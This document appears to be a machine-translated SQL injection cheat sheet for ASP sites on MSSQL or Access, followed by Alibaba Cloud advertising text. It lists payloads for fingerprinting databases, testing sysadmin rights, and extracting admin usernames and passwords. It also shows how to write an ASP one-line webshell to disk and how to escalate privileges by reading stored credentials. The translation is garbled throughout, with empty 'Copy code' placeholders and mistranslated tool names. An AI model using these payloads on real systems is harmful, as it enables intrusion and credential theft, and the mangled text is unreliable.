Determine whether there are any vulnerabilities: Rough Type:
CopyCode
1. Number Type:
Copy code
2. Balanced type:
Copy code
3. Search type:
Copy code
(PS: the third one may not be commonly used. It is generally written in ASP scripts as: keyword = request ("keyword "), when "distinct" is assigned to an SQL statement, it is changed to select * from table name where keyword like '% keyword % ')
Simple judgment of database information:
Statement type (IIS reports no error, and the statements are differentiated by themselves ): And user> 0 And (select count (*) from msysobjects)> 0 ...... (The page error is Access database) And (select count (*) from sysobjects)> 0 ...... (The page is normally in the MSSQL database) And db_name ()> 0 ...... (Database Name explosion) Version> 0 (explosion of sqlserver version information and server operating system type and Version Information) Rough Type: gal' (based on the server error message) Addition; -- (; and -- MSSQL databases generally have,; indicates separation, -- is not in the ACCESS database annotation)
Determine MySQL permissions: And 0 <> (select issrvrolemember ('sysadmin') -- (SA if the page is normal) And 0 <> (select is_member ('db _ owner') -- (db_owner if the page is normal) And 0 <> (select is_member ('public') -- (if the page is normal, it is public)
PS: The preceding method applies when the parameter is 'int'. If the parameter is 'struct', you need to add 'and 'query statement after the parameter ;--
Start SQL injection ):
Name of the table to be guessed: And 0 <> (select count (*) from Table Name) or and exists (select * from table name) And 1 <(select count (*) from Table Name) (page error indicates that the number of accounts is 1) Guess the field: And exists (select field name from Table Name) (the page exists normally and does not exist normally) Length of the username and password: And (select top 1 Len (column name) from Table Name)> N (top indicates that the first record is extracted; n is the length of the column for transformation and prediction, A page error indicates that the column length is N) For example, and 1 = (select count (*) from user where Len (name)> 6) Error And 1 = (select count (*) from user where Len (name)> 5) Correct The length is 6.
Guess the username and password: and (select top 1 ASC (mid (column name, 1, 1) from Table Name)> 0 For example: and (select top 1 ASC (mid (user,) from name)> 96 page normal And (select top 1 ASC (mid (user, 1, 1) from name)> 97 page Error Then the ascll code is 97.
PS: Because the MD5 ciphertext is only 16, 18, 32, and 40, you only need to try the 15,16, 17,18, 31,32, 39,40 and so on when you guess the password. Start SQL injection (MySQL ):
Table Name and field: having 1 = 1 -- Insert new record: group by users. ID having 1 = 1 -- Group by users. ID, users. username, users. Password, users. privs having 1 = 1 -- ; Insert into users values (666, attacker, foobar, 0 xFFFF )-- Name of the table to be guessed: and (select top 1 name from sysobjects where xtype = 'U')> 0 (obtain the first table name) And (select top 1 name from sysobjects where xtype = 'U' and name not in ('user')> 0 (get the second table name) .................. Name of the column to be guessed: and (select top 1 col_name (object_id ('field'), 1) from sysobjects)> 0 (obtain the first column name of the field) Guess the content of the field: and (select top 1 column name from [Table name])> 0 For example, and (select top 1 username from [admin])> 0 (get user name) And (select top 1 password from [admin])> 0 (get password)
Export webshell:
1. Use the SQL command execution function to export webshell: Select '<% execute request ("A") %>' into [vote] In 'd: \ WEB \ x.asp;.xls ''excel 8.0;' from vote PS: You must provide the SQL Execution function and know the absolute path (vote is a known table segment) 2. create a one-sentence Trojan horse with the name of field a being 50 characters in length and with the password of 90sec inserted in field A of table, export the content of Table A as an Excel file in the physical path. After exporting the content as an Excel file, you can use the IIS Parsing Vulnerability to become a pony. Statement:
copy Code
Elevation of Privilege:
1. add an account directly under the system permission (if possible): run the CMD command to add the account 2. use the permission escalation function provided by shell: serv_u, pcAnywhere, and Radmin password reading. Try all of them 3. exploit system vulnerabilities to escalate permissions: use Brazilian barbecue to escalate permissions, and enter C in the CMD command line: \ recycler \ 1.exespace character command, 1.exe is a Brazilian barbecue 4. privilege Escalation using software vulnerabilities (this opportunity is relatively slim, and I have never succeeded) 5. in Conn. ASP webconfig. search for the SA password or Inc. the root password in the file such as PHP (you can use the CMD statement to find the password, for example, using the CMD command DIR/s d: \ Conn. ASP or DIR/s d: \ * Inc *. PHP to find the configuration file)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
